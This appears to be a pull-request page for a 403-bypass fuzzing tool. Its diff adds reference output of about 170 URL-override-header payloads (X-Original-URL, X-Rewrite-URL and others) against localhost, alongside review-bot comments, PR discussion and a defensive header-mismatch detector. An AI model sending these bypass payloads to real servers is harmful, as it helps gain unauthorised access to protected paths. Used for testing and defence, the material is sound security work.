Jtof fap header url #14
Diff of diff --git a/tests-history/bup-payloads-2022-10-06.lst b/tests-history/bup-payloads-2022-11-21.lst
index 000cb1a..af485f4 100644
--- a/tests-history/bup-payloads-2022-10-06.lst
+++ b/tests-history/bup-payloads-2022-11-21.lst
@@ -1,5 +1,5 @@
-Bypasser has generated 3044 payloads for 'http://127.0.0.1:8000/foo/bar' url:
+Bypasser has generated 3213 payloads for 'http://127.0.0.1:8000/foo/bar' url:
[case_substitution] http://127.0.0.1:8000/Foo/bar
[case_substitution] http://127.0.0.1:8000/fOo/bar
[case_substitution] http://127.0.0.1:8000/foO/bar
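Review bot: the total on the first line changes from 3044 to 3213, an increase of 169, while the PR text says "approximately 170 additional bypass requests". Since this file is the reference output, quote the exact figure in the description or changelog so a later regeneration can be checked against it.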
@@ -2048,6 +2048,175 @@ Bypasser has generated 3044 payloads for 'http://127.0.0.1:8000/foo/bar' url:
[http_headers_scheme] -H X-Url-Scheme: http http://127.0.0.1:8000/foo/bar
[http_headers_scheme] -H X-Url-Scheme: https http://127.0.0.1:8000/foo/bar
[http_headers_scheme] -H X-Url-Scheme: webdav http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Base-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Http-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Http-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Http-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Http-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Http-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Http-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Original-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Original-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Original-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Proxy-Request-FullURI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-Request-FullURI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-Request-FullURI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Proxy-Request-FullURI: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Proxy-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Proxy-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Referer: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Referer: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Referer: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Referer: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Referer: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Request-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Request-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Request-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Request-URI: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Accel-Redirect: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Accel-Redirect: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Accel-Redirect: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Cf-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Cf-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Cf-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Cf-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Cf-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Cf-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Envoy-Original-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Envoy-Original-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Envoy-Original-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Flx-Redirect-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Flx-Redirect-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Flx-Redirect-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Flx-Redirect-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Flx-Redirect-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Flx-Redirect-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Forwarded-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Forwarded-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Forwarded-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Forwarded-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-HTTP-DestinationURL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-DestinationURL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-DestinationURL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-HTTP-DestinationURL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-DestinationURL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-DestinationURL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-HTTP-Path-Override: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-Path-Override: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-Path-Override: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-MS-Endpoint-Absolute-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-MS-Endpoint-Absolute-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-MS-Endpoint-Absolute-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Ning-Request-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Ning-Request-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Ning-Request-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Ning-Request-URI: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Original-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Original-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Original-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Original-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Override-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Override-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Override-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Override-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Override-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Override-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Proxy-Request: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-Request: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-Request: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Proxy-Request: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Proxy-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Proxy-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Referer: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referer: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referer: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Referer: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referer: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referrer: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referrer: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referrer: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Referrer: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referrer: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Rewrite-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Rewrite-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Route-Request: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Route-Request: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Route-Request: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Route-Request: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Sendfile: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Sendfile: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Sendfile: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Sendfile: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Wap-Profile: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Wap-Profile: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Wap-Profile: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Wap-Profile: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
[http_methods] -X ACL http://127.0.0.1:8000/foo/bar
[http_methods] -X BIND http://127.0.0.1:8000/foo/bar
[http_methods] -X CHECKIN http://127.0.0.1:8000/foo/bar |
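Review bot: the complete-URL values are applied unevenly across the added [http_headers_url] lines, and nothing in the hunk or the description says why. Headers such as Base-URL and X-Original-URL get all three complete-URL values; Proxy-Request-FullURI, Request-URI, X-Ning-Request-URI, X-Proxy-Request, X-Route-Request, X-Sendfile and X-Wap-Profile get only `http://127.0.0.1:8000/foo/bar` against the base URL; Referer, X-Referer and X-Referrer get the two parent URLs but not that one. If this comes from set de-duplication against another mode or from a deliberate per-header choice, document it next to the header list; otherwise the generator is dropping cases. The hunk also shows 38 distinct header names while the description says 26 new headers, so the README should state which headers are new to the tool and which were moved from another mode.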
Awesome addon man!
On the performance part no significant change but since the last commit when I can use a set instead of a list in a loop I don't hesitate anymore :-) I had coded this just after the last PR. The new mode is invoked by default:
Hey hey!
Another PR, it's been a long time!

Small tweaks for code cleaning and performance:
`*` operator to make a list of tuples

Added support for a new bypass mode `-m http_headers_url`: 26 new headers supposed to take a URL as argument (`*URL`, `*URI`, `*Path`, `Referer`, etc.) and approximately 170 additional bypass requests.

Fuzzing approach for this new mode. For example, for `X-Original-URL` on the `http://127.0.0.1:8000/foo/bar` url:

Classic variant: Targets the base_url and moves original path to the headers:
Second variant: Targets the base_url and moves target_url to the headers (only for some headers susceptible to take a complete url as argument and not just a path):
Third variant: Keeps the original target_url and goes up the parent paths in headers:
Fourth variant: Same as third but with complete url (only for some headers):
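
A defender's view of the four variants described above, as an added example that is not part of the PR or the project's code: a check that flags requests whose URL-override header disagrees with the request line and labels which variant shape it matches. The header subset is taken from the diff; the function names (`classify`, `run_samples`) and the sample requests are constructed for illustration.

```python
from urllib.parse import urlsplit

# Subset of the header names from the diff above, lower-cased for matching.
URL_OVERRIDE_HEADERS = {
    "x-original-url", "x-rewrite-url", "x-override-url", "x-forwarded-uri",
    "x-original-uri", "x-envoy-original-path", "x-http-path-override", "base-url",
}

def _segments(path):
    return [s for s in path.split("/") if s]

def classify(request_path, headers):
    """Flag URL-override headers that disagree with the request line.
    Returns (header_name, variant) pairs; variant follows the PR description:
      1 request to a shorter path, deeper path in the header
      2 same as 1, header carries a complete URL
      3 request to the target, parent path in the header
      4 same as 3, header carries a complete URL
      0 header path unrelated to the request path
    """
    findings = []
    req = _segments(request_path)
    for name, value in headers.items():
        if name.lower() not in URL_OVERRIDE_HEADERS:
            continue
        parts = urlsplit(value.strip())
        absolute = bool(parts.scheme and parts.netloc)
        hdr = _segments(parts.path)
        if hdr == req:
            continue  # header agrees with the request line
        if len(hdr) > len(req) and hdr[:len(req)] == req:
            findings.append((name, 2 if absolute else 1))
        elif len(hdr) < len(req) and req[:len(hdr)] == hdr:
            findings.append((name, 4 if absolute else 3))
        else:
            findings.append((name, 0))
    return findings

# Constructed sample requests: (request path, headers as received at the edge).
SAMPLES = [
    ("/", {"X-Original-URL": "/foo/bar"}),
    ("/", {"X-Rewrite-URL": "http://127.0.0.1:8000/foo/bar"}),
    ("/foo/bar", {"X-Original-URL": "/foo"}),
    ("/foo/bar", {"X-Original-URL": "http://127.0.0.1:8000/"}),
    ("/foo/bar", {"User-Agent": "curl/8.0", "X-Original-URL": "/foo/bar"}),
]

def run_samples():
    return [classify(path, hdrs) for path, hdrs in SAMPLES]
```

Any non-empty result means a client-supplied header disagrees with the request line; an edge proxy that does not itself set these headers can drop them before routing or access-control decisions are made.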